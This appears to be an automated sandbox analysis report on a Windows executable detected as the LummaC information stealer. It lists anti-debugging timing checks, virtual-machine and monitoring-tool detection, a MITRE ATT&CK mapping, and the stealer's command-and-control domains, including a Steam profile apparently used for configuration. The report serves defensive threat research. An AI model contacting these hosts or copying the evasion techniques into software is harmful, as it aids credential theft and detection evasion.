Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3255 second address: FB325B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB325B second address: FB3270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1980h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3543 second address: FB3547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3BC4 second address: FB3BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3D4B second address: FB3D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3D4F second address: FB3D55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3D55 second address: FB3D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3D60 second address: FB3D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD25CDB1976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3FDE second address: FB4017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FD25C84A633h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FD25C84A638h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB59D1 second address: FB59D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8577 second address: FB857D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB857D second address: FB8581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8581 second address: FB8585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8585 second address: FB85A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dx, 4B83h 0x00000010 mov dx, si 0x00000013 push 00000004h 0x00000015 mov dh, al 0x00000017 call 00007FD25CDB1979h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8814 second address: FB8818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8818 second address: FB881E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB881E second address: FB8828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD25C84A626h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8828 second address: FB883A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD25CDB1976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB883A second address: FB883E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB883E second address: FB8879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FD25CDB1976h 0x0000000d jo 00007FD25CDB1976h 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 stc 0x00000017 push dword ptr [ebp+122D340Bh] 0x0000001d mov dword ptr [ebp+122D1CEDh], eax 0x00000023 xor dx, 652Dh 0x00000028 call 00007FD25CDB1979h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jnl 00007FD25CDB1976h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8879 second address: FB887F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB887F second address: FB88BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD25CDB197Ch 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FD25CDB197Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007FD25CDB1976h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB88BB second address: FB88DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD25C84A626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD25C84A632h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9AA4 second address: FB9AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9AA8 second address: FB9AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9AAE second address: FB9AD2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD25CDB197Bh 0x00000008 pop edi 0x00000009 jp 00007FD25CDB197Eh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030E53 second address: 5030E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030E57 second address: 5030E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030E5D second address: 5030E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25C84A62Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030E6E second address: 5030EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [eax+00000FDCh] 0x00000011 jmp 00007FD25CDB197Eh 0x00000016 test ecx, ecx 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c movsx ebx, si 0x0000001f popad 0x00000020 jns 00007FD25CDB19D3h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push ebx 0x0000002a pop esi 0x0000002b pushfd 0x0000002c jmp 00007FD25CDB1983h 0x00000031 sbb ecx, 3C06C5AEh 0x00000037 jmp 00007FD25CDB1989h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030EE3 second address: 5030EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030EE9 second address: 5030EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030EED second address: 5030F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a jmp 00007FD25C84A62Fh 0x0000000f mov eax, dword ptr [eax+00000860h] 0x00000015 pushad 0x00000016 mov ecx, 6D05033Bh 0x0000001b pushfd 0x0000001c jmp 00007FD25C84A630h 0x00000021 or eax, 20173988h 0x00000027 jmp 00007FD25C84A62Bh 0x0000002c popfd 0x0000002d popad 0x0000002e test eax, eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD25C84A635h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030F4F second address: 5030F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25CDB197Ch 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D23EDF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D23E1B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EE7D32 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F51D36 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 5864	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6172	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081916558.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2082066157.000000000125D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.000000000125D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000125D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: file.exe, 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D05BB0 LdrInitializeThunk,

0_2_00D05BB0

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: licendfilteo.site
Source: file.exe	String found in binary or memory: clearancek.site
Source: file.exe	String found in binary or memory: bathdoomgaz.stor
Source: file.exe	String found in binary or memory: spirittunek.stor
Source: file.exe	String found in binary or memory: dissapoiznw.stor
Source: file.exe	String found in binary or memory: studennotediw.stor
Source: file.exe	String found in binary or memory: mobbipenju.stor
Source: file.exe	String found in binary or memory: eaglepawnoy.stor

Source: file.exe, 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	631 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	223 System Information Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	49%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
steamcommunity.com	0%	Virustotal	Browse
sergei-esenin.com	20%	Virustotal	Browse
eaglepawnoy.store	19%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/badges	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	23.199.218.33	true	true	0%, Virustotal, Browse	unknown
sergei-esenin.com	172.67.206.204	true	true	20%, Virustotal, Browse	unknown
eaglepawnoy.store	unknown	unknown	true	19%, Virustotal, Browse	unknown
bathdoomgaz.store	unknown	unknown	true		unknown
spirittunek.store	unknown	unknown	true		unknown
licendfilteo.site	unknown	unknown	true		unknown
studennotediw.store	unknown	unknown	true		unknown
mobbipenju.store	unknown	unknown	true		unknown
clearancek.site	unknown	unknown	true		unknown
dissapoiznw.store	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
bathdoomgaz.store	true	unknown
studennotediw.store	true	unknown
clearancek.site	true	unknown
dissapoiznw.store	true	unknown
https://steamcommunity.com/profiles/76561199724331900	true	unknown
spirittunek.store	true	unknown
licendfilteo.site	true	unknown
eaglepawnoy.store	true	unknown
mobbipenju.store	true	unknown
https://sergei-esenin.com/api	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/my/wishlist/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/puL	file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/?subsection=broadcasts	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://help.steampowered.com/en/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001251000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076843236.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082296460.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/subscriber_agreement/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/9	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/apiZ	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOj	file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/apiBi	file.exe, 00000000.00000003.2075795621.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076843236.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082296460.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://store.steampowered.com/steam_refunds/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.steamstatic.com/public/javascript/applications/community/lib	file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/apiL	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&l=en	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/images/responsive/header_logo.png	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://licendfilteo.site/api	file.exe, 00000000.00000003.2068820165.000000000125D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/learning/accesa	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.c	file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
